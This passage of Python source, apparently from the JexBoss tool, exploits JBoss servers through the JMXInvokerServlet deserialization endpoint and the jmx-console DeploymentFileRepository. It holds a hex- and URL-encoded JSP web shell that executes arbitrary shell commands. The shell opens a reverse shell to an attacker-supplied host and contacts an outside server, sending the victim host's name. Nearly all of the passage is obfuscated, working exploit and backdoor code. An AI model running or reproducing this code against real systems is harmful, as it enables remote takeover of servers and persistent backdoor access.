"\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65" "\x72\x28\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x3B\x53" "\x74\x72\x69\x6E\x67\x20\x6C\x76\x3D\x62\x72\x2E\x72\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x2E\x73" "\x70\x6C\x69\x74\x28\x22\x20\x22\x29\x5B\x31\x5D\x3B\x69\x66\x28\x21\x6C\x76\x2E\x65\x71\x75\x61" "\x6C\x73\x28\x22\x34\x22\x29\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x28\x22\x4E\x65\x77\x20" "\x76\x65\x72\x73\x69\x6F\x6E\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x75\x70\x64\x61\x74\x65\x21\x22" "\x29\x3B\x7D\x7D\x65\x6C\x73\x65\x20\x69\x66\x28\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22" "\x69\x64\x22\x29\x21\x3D\x2D\x31\x7C\x7C\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22\x69\x70" "\x63\x6F\x6E\x66\x69\x67\x22\x29\x21\x3D\x2D\x31\x29\x7B\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74" "\x53\x74\x72\x65\x61\x6D\x28\x29\x3B\x7D\x7D\x7D\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70\x74" "\x69\x6F\x6E\x20\x65\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x22\x46\x61\x69\x6C" "\x65\x64\x20\x74\x6F\x20\x63\x68\x65\x63\x6B\x20\x66\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x73\x22" "\x29\x3B\x7D\x74\x72\x79\x7B\x50\x72\x6F\x63\x65\x73\x73\x20\x70\x3B\x62\x6F\x6F\x6C\x65\x61\x6E" "\x20\x6E\x69\x78\x3D\x74\x72\x75\x65\x3B\x69\x66\x28\x21\x53\x79\x73\x74\x65\x6D\x2E\x67\x65\x74" "\x50\x72\x6F\x70\x65\x72\x74\x79\x28\x22\x66\x69\x6C\x65\x2E\x73\x65\x70\x61\x72\x61\x74\x6F\x72" "\x22\x29\x2E\x65\x71\x75\x61\x6C\x73\x28\x22\x2F\x22\x29\x29\x7B\x6E\x69\x78\x3D\x66\x61\x6C\x73" "\x65\x3B\x7D\x69\x66\x28\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22\x6A\x65\x78\x72\x65\x6D" "\x6F\x74\x65\x3D\x22\x29\x21\x3D\x2D\x31\x29\x7B\x53\x6F\x63\x6B\x65\x74\x20\x73\x63\x3D\x6E\x65" "\x77\x20\x53\x6F\x63\x6B\x65\x74\x28\x73\x68\x2E\x73\x70\x6C\x69\x74\x28\x22\x3D\x22\x29\x5B\x31" "\x5D\x2E\x73\x70\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x30\x5D\x2C\x49\x6E\x74\x65\x67\x65\x72\x2E" "\x70\x61\x72\x73\x65\x49\x6E\x74\x28\x73\x68\x2E\x73\x70\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x31" "\x5D\x29\x29\x3B\x69\x66\x28\x6E\x69\x78\x29\x7B\x73\x68\x3D\x22\x2F\x62\x69\x6E\x2F\x62\x61\x73" "\x68\x22\x3B\x7D\x65\x6C\x73\x65\x7B\x73\x68\x3D\x22\x63\x6D\x64\x2E\x65\x78\x65\x22\x3B\x7D\x70" "\x3D\x52\x75\x6E\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78" "\x65\x63\x28\x73\x68\x29\x3B\x28\x6E\x65\x77\x20\x72\x76\x28\x70\x2E\x67\x65\x74\x49\x6E\x70\x75" "\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x2C\x73\x63\x2E\x67\x65\x74\x4F\x75\x74\x70\x75\x74\x53\x74" "\x72\x65\x61\x6D\x28\x29\x29\x29\x2E\x73\x74\x61\x72\x74\x28\x29\x3B\x28\x6E\x65\x77\x20\x72\x76" "\x28\x73\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x2C\x70\x2E\x67" "\x65\x74\x4F\x75\x74\x70\x7A\x00\x00\x01\xDB\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x2E" "\x73\x74\x61\x72\x74\x28\x29\x3B\x7D\x65\x6C\x73\x65\x7B\x69\x66\x28\x6E\x69\x78\x29\x7B\x70\x3D" "\x52\x75\x6E\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78\x65" "\x63\x28\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x5B\x5D\x7B\x22\x2F\x62\x69\x6E\x2F\x62\x61\x73" "\x68\x22\x2C\x22\x2D\x63\x22\x2C\x73\x68\x7D\x29\x3B\x7D\x65\x6C\x73\x65\x7B\x70\x3D\x52\x75\x6E" "\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78\x65\x63\x28\x22" "\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x43\x20\x22\x2B\x73\x68\x29\x3B\x7D\x62\x72\x3D\x6E\x65\x77" "\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75" "\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65\x72\x28\x70\x2E\x67\x65\x74\x49\x6E\x70\x75\x74" "\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x3B\x53\x74\x72\x69\x6E\x67\x20\x64\x3D\x62\x72\x2E\x72" "\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x3B\x77\x68\x69\x6C\x65\x28\x64\x20\x21\x3D\x20\x6E\x75\x6C" "\x6C\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x64\x29\x3B\x64\x3D\x62\x72\x2E\x72" "\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x3B\x7D\x7D\x7D\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70" "\x74\x69\x6F\x6E\x20\x65\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x22\x55\x6E\x6B" "\x6E\x6F\x77\x6E\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x22\x29\x3B\x7D\x7D\x25\x3E\x73\x72\x00\x11\x6A" "\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x42\x6F\x6F\x6C\x65\x61\x6E\xCD\x20\x72\x80\xD5\x9C\xFA\xEE" "\x02\x00\x01\x5A\x00\x05\x76\x61\x6C\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61" "\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00" "\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E" "\x67\x71\x00\x7E\x00\x0F\x71\x00\x7E\x00\x0F\x71\x00\x7E\x00\x0F\x74\x00\x07\x62\x6F\x6F\x6C\x65" "\x61\x6E\xF9\x12\x63\x17\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6F\x72\x67" "\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x49\x6E\x76\x6F\x63\x61" "\x74\x69\x6F\x6E\x4B\x65\x79\xB8\xFB\x72\x84\xD7\x93\x85\xF9\x02\x00\x01\x49\x00\x07\x6F\x72\x64" "\x69\x6E\x61\x6C\x78\x70\x00\x00\x00\x04\x70\x78") headers = { "Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue", "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent() } r = gl_http_pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload) result = r.status if result == 401: jexboss.print_and_flush(" Retrying...") gl_http_pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload) return get_successfully(url, "/jexinv4/jexinv4.jsp")
def exploit_jmx_console_file_repository(url): """ Exploit DeploymentFileRepository to deploy a JSP shell Tested and working in JBoss 4, 5. Does not work in JBoss 6. /jmx-console/HtmlAdaptor :param url: The URL to exploit :return: The HTTP status code """ jsp = ( "%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%6C%61%6E%67%2E%2A%2C%6A%61" "%76%61%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%6A%61%76%61%2E%6E%65%74%2E%2A%22%20" "%70%61%67%65%45%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20" "%63%6C%61%73%73%20%72%76%20%65%78%74%65%6E%64%73%20%54%68%72%65%61%64%7B%49%6E%70%75%74%53%74%72" "%65%61%6D%20%69%73%3B%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%3B%72%76%28%49%6E%70%75%74%53" "%74%72%65%61%6D%20%69%73%2C%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%29%7B%74%68%69%73%2E%69" "%73%3D%69%73%3B%74%68%69%73%2E%6F%73%3D%6F%73%3B%7D%70%75%62%6C%69%63%20%76%6F%69%64%20%72%75%6E" "%28%29%7B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%69%6E%3D%6E%75%6C%6C%3B%42%75%66%66%65%72" "%65%64%57%72%69%74%65%72%20%6F%75%74%3D%6E%75%6C%6C%3B%74%72%79%7B%69%6E%3D%6E%65%77%20%42%75%66" "%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65" "%72%28%74%68%69%73%2E%69%73%29%29%3B%6F%75%74%3D%6E%65%77%20%42%75%66%66%65%72%65%64%57%72%69%74" "%65%72%28%6E%65%77%20%4F%75%74%70%75%74%53%74%72%65%61%6D%57%72%69%74%65%72%28%74%68%69%73%2E%6F" "%73%29%29%3B%63%68%61%72%20%62%5B%5D%3D%6E%65%77%20%63%68%61%72%5B%38%31%39%32%5D%3B%69%6E%74%20" "%6C%3B%77%68%69%6C%65%28%28%6C%3D%69%6E%2E%72%65%61%64%28%62%2C%30%2C%62%2E%6C%65%6E%67%74%68%29" "%29%3E%30%29%7B%6F%75%74%2E%77%72%69%74%65%28%62%2C%30%2C%6C%29%3B%6F%75%74%2E%66%6C%75%73%68%28" "%29%3B%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%7D%7D%7D%53%74%72%69%6E%67" "%20%73%68%3D%6E%75%6C%6C%3B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72" "%28%22%70%70%70%22%29%21%3D%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%50%61%72" "%61%6D%65%74%65%72%28%22%70%70%70%22%29%3B%7D%65%6C%73%65%20%69%66%28%72%65%71%75%65%73%74%2E%67" "%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%21%3D%20%6E%75%6C%6C%29%7B%73%68%3D%72%65%71" "%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%3B%7D%69%66%28%73%68%20%21" "%3D%20%6E%75%6C%6C%29%7B%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28" "%22%74%65%78%74%2F%68%74%6D%6C%22%29%3B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%3D%6E" "%75%6C%6C%3B%53%74%72%69%6E%67%20%6C%68%63%3D%28%6E%65%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72" "%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70" "%6C%61%63%65%41%6C%6C%28%22%20%22%2C%22%2D%22%29%3B%74%72%79%7B%69%66%28%72%65%71%75%65%73%74%2E" "%67%65%74%48%65%61%64%65%72%28%22%6E%6F%2D%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%3D%3D%6E" "%75%6C%6C%29%7B%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%3D%28%48%74%74%70%55%52" "%4C%43%6F%6E%6E%65%63%74%69%6F%6E%29%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73" "%68%65%6C%6C%2E%6A%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74" "%22%29%2E%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%63%2E%73%65%74%52%65%71%75%65%73%74" "%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22%2C%72%65%71%75%65%73%74%2E%67%65" "%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74" "%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B%69%66%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63" "%6B%5F%22%2B%6C%68%63%29%2E%65%78%69%73%74%73%28%29%29%7B%50%72%69%6E%74%57%72%69%74%65%72%20%77" "%3D%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%3B%77" "%2E%63%6C%6F%73%65%28%29%3B%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E" "%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%63%2E%67%65%74%49%6E%70%75%74%53" "%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%6C%76%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28" "%29%2E%73%70%6C%69%74%28%22%20%22%29%5B%31%5D%3B%69%66%28%21%6C%76%2E%65%71%75%61%6C%73%28%22%34" "%22%29%29%7B%6F%75%74%2E%70%72%69%6E%74%28%22%4E%65%77%20%76%65%72%73%69%6F%6E%2E%20%50%6C%65%61" "%73%65%20%75%70%64%61%74%65%21%22%29%3B%7D%7D%65%6C%73%65%20%69%66%28%73%68%2E%69%6E%64%65%78%4F" "%66%28%22%69%64%22%29%21%3D%2D%31%7C%7C%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%70%63%6F%6E%66%69" "%67%22%29%21%3D%2D%31%29%7B%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%7D%7D%7D%63" "%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%46" "%61%69%6C%65%64%20%74%6F%20%63%68%65%63%6B%20%66%6F%72%20%75%70%64%61%74%65%73%22%29%3B%7D%74%72" "%79%7B%50%72%6F%63%65%73%73%20%70%3B%62%6F%6F%6C%65%61%6E%20%6E%69%78%3D%74%72%75%65%3B%69%66%28" "%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69%6C%65%2E%73%65%70%61%72%61" "%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%6E%69%78%3D%66%61%6C%73%65%3B%7D%69%66" "%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%6A%65%78%72%65%6D%6F%74%65%3D%22%29%21%3D%2D%31%29%7B%53" "%6F%63%6B%65%74%20%73%63%3D%6E%65%77%20%53%6F%63%6B%65%74%28%73%68%2E%73%70%6C%69%74%28%22%3D%22" "%29%5B%31%5D%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2C%49%6E%74%65%67%65%72%2E%70%61%72%73%65" "%49%6E%74%28%73%68%2E%73%70%6C%69%74%28%22%3A%22%29%5B%31%5D%29%29%3B%69%66%28%6E%69%78%29%7B%73" "%68%3D%22%2F%62%69%6E%2F%62%61%73%68%22%3B%7D%65%6C%73%65%7B%73%68%3D%22%63%6D%64%2E%65%78%65%22" "%3B%7D%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%73%68" "%29%3B%28%6E%65%77%20%72%76%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%73%63%2E" "%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%28%6E%65%77" "%20%72%76%28%73%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%70%2E%67%65%74%4F%75%74" "%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%7D%65%6C%73%65%7B%69%66%28%6E" "%69%78%29%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28" "%6E%65%77%20%53%74%72%69%6E%67%5B%5D%7B%22%2F%62%69%6E%2F%62%61%73%68%22%2C%22%2D%63%22%2C%73%68" "%7D%29%3B%7D%65%6C%73%65%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E" "%65%78%65%63%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%7D%62%72%3D%6E%65%77%20%42" "%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61" "%64%65%72%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20" "%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%77%68%69%6C%65%28%64%20%21%3D%20%6E%75%6C%6C%29" "%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%29%3B%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B" "%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C" "%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%22%29%3B%7D%7D%25%3E" ) payload = ( "/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=" "DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=" "jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.St" "ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True") headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent() } gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers) return get_successfully(url, "/jexws4/jexws4.jsp")